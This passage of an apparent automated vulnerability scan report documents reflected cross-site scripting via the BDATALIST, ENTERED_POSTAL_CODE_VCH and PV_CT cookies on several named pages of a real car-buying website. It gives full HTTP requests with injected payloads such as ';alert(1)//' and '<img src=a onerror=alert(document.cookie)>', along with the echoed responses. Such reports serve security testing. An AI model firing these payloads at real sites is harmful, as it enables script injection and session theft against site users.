The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21f6d"%3balert(1)//09994992f77 was submitted in the BDATALIST cookie. This input was echoed as 21f6d";alert(1)//09994992f77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-reviews.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c421f6d"%3balert(1)//09994992f77; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:47:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:12 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:12 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 49230

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c421f6d";alert(1)//09994992f77";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "483BAABF-A247-FB44-8C83710A
...[SNIP]...

4.2021. http://www.autobytel.com/car-reviews.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-reviews.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce5e4"%3balert(1)//c24be204b0b was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as ce5e4";alert(1)//c24be204b0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-reviews.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=ce5e4"%3balert(1)//c24be204b0b; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:54:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:18 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:54:18 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 49230

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
rchhome|";

           //s.prop9 = "researchhome|Search Engine Optimization Project|13148";
           s.prop10 = "researchhome|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "ce5e4";alert(1)//c24be204b0b||";

           s.prop14 = "car reviews page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "researchhome|||rec|sky|b
...[SNIP]...

4.2022. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/finance/index.cfm/action/Calculator

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2143"%3balert(1)//07a6e47bb9b was submitted in the BDATALIST cookie. This input was echoed as b2143";alert(1)//07a6e47bb9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/buy/finance/index.cfm/action/Calculator HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4b2143"%3balert(1)//07a6e47bb9b; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:31:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:31:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:31:33 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:31:33 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 35815



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4b2143";alert(1)//07a6e47bb9b";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47AC8092-D1BC-5AFE-EA65B824
...[SNIP]...

4.2023. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/finance/index.cfm/action/Calculator

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b9db"%3balert(1)//ddc5d696033 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 1b9db";alert(1)//ddc5d696033 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/buy/finance/index.cfm/action/Calculator HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=1b9db"%3balert(1)//ddc5d696033; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:33:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:52 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:52 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 35825



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...
//s.prop7 = "finins|";

           //s.prop9 = "finins|Search Engine Optimization Project|13148";
           s.prop10 = "finins|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "1b9db";alert(1)//ddc5d696033||";

           s.prop14 = "buy|finance|calculator : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "finins||||sky|ban|
...[SNIP]...

4.2024. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/finance/index.cfm/action/Calculator

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 46134<img%20src%3da%20onerror%3dalert(1)>abf1bae3adb was submitted in the PV_CT cookie. This input was echoed as 46134<img src=a onerror=alert(1)>abf1bae3adb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/buy/finance/index.cfm/action/Calculator HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=246134<img%20src%3da%20onerror%3dalert(1)>abf1bae3adb; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 43522
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:32:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:32:32 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:32:32 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:32:32 GMT;path=/



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 246134<img src=a onerror=alert(1)>abf1bae3adb cannot be converted to a number.
</h1>
...[SNIP]...

4.2025. http://www.autobytel.com/content/buy/index.cfm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/index.cfm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d2fa"%3balert(1)//593170551a3 was submitted in the BDATALIST cookie. This input was echoed as 9d2fa";alert(1)//593170551a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/buy/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c49d2fa"%3balert(1)//593170551a3; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:29:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:29:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:29:51 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:29:51 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 57692

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c49d2fa";alert(1)//593170551a3";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "479CCD90-ECB3-F82E-73E75041
...[SNIP]...

4.2026. http://www.autobytel.com/content/buy/index.cfm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/index.cfm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65796"%3balert(1)//be62058463a was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 65796";alert(1)//be62058463a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/buy/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=65796"%3balert(1)//be62058463a; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 57730
Expires: Mon, 24 Jan 2011 23:36:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:36:08 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=65796;expires=Wed, 16-Jan-2041 23:36:08 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:36:08 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
= "research|All";

           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "65796";alert(1)//be62058463a||";

           s.prop14 = "search : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research|||rec|sky|ban|Search Engi
...[SNIP]...

4.2027. http://www.autobytel.com/content/buy/index.cfm [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/index.cfm

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 621ab<img%20src%3da%20onerror%3dalert(1)>0e7859121e3 was submitted in the PV_CT cookie. This input was echoed as 621ab<img src=a onerror=alert(1)>0e7859121e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/buy/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2621ab<img%20src%3da%20onerror%3dalert(1)>0e7859121e3; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response (redirected)

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 65412
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:33:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:24 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:24 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:24 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 2621ab<img src=a onerror=alert(1)>0e7859121e3 cannot be converted to a number.
</h1>
...[SNIP]...

4.2028. http://www.autobytel.com/content/buy/warranty/index.cfm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/warranty/index.cfm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 808f3"%3balert(1)//bcba1c35209 was submitted in the BDATALIST cookie. This input was echoed as 808f3";alert(1)//bcba1c35209 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/buy/warranty/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4808f3"%3balert(1)//bcba1c35209; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:28:01 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:28:01 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 39513

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4808f3";alert(1)//bcba1c35209";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "478BF05D-E586-7BA2-0D931DEA
...[SNIP]...

4.2029. http://www.autobytel.com/content/buy/warranty/index.cfm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/warranty/index.cfm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acb53"%3balert(1)//e8c2790b457 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as acb53";alert(1)//e8c2790b457 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/buy/warranty/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=acb53"%3balert(1)//e8c2790b457; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

